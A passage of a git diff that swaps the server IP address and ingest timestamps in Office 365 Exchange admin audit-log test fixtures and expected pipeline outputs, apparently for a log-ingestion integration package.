-6578,7 +6578,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "Force", @@ -6640,7 +6640,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:16\",\"ExternalAccess\":true,\"Id\":\"c6db95ea-9eae-4b58-d692-08d7adfc0d98\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:16\",\"ExternalAccess\":true,\"Id\":\"c6db95ea-9eae-4b58-d692-08d7adfc0d98\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -6652,7 +6652,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", @@ -6726,7 +6726,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:52\",\"ExternalAccess\":true,\"Id\":\"c706f54e-1b00-43ed-5b06-08d7ac0f47a6\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\",\"Operation\":\"Set-RecipientEnforcementProvisioningPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\"},{\"Name\":\"PublicFolderHierarchyMailboxCountQuota\",\"Value\":\"100\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:52\",\"ExternalAccess\":true,\"Id\":\"c706f54e-1b00-43ed-5b06-08d7ac0f47a6\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\",\"Operation\":\"Set-RecipientEnforcementProvisioningPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\"},{\"Name\":\"PublicFolderHierarchyMailboxCountQuota\",\"Value\":\"100\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -6738,7 +6738,7 @@ "Operation": "Set-RecipientEnforcementProvisioningPolicy", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "DomainController", @@ -6768,7 +6768,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"fcd82149-fc1c-4866-e16d-08d7adfc0cff\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"fcd82149-fc1c-4866-e16d-08d7adfc0cff\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -6780,7 +6780,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", @@ -6854,7 +6854,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:44\",\"ExternalAccess\":true,\"Id\":\"e79cb83c-25b7-4777-57f0-08d7ac0f1f74\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"Management\",\"Value\":\"True\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange Migration\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"Migration\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:44\",\"ExternalAccess\":true,\"Id\":\"e79cb83c-25b7-4777-57f0-08d7ac0f1f74\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"Management\",\"Value\":\"True\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange Migration\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"Migration\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -6866,7 +6866,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "ProhibitSendReceiveQuota", @@ -6948,7 +6948,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:16\",\"ExternalAccess\":true,\"Id\":\"e9e580ee-ac04-436f-9214-08d7adfc0d8b\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:16\",\"ExternalAccess\":true,\"Id\":\"e9e580ee-ac04-436f-9214-08d7adfc0d8b\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -6960,7 +6960,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-exchange-admin-events.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-exchange-admin-events.json-expected.json index c986caee655..fa9f120c507 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-exchange-admin-events.json-expected.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-exchange-admin-events.json-expected.json @@ -2,12 +2,12 @@ "expected": [ { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -37,7 +37,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -49,8 +49,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177536800Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:49\",\"ExternalAccess\":true,\"Id\":\"1c7412a6-858d-49ff-3f93-08d7ac0f45bf\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.852951400Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:49\",\"ExternalAccess\":true,\"Id\":\"1c7412a6-858d-49ff-3f93-08d7ac0f45bf\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -70,12 +70,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -118,7 +118,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -130,8 +130,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177555800Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"6c3454e1-1a13-411b-bed1-08d7adfc0c09\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted 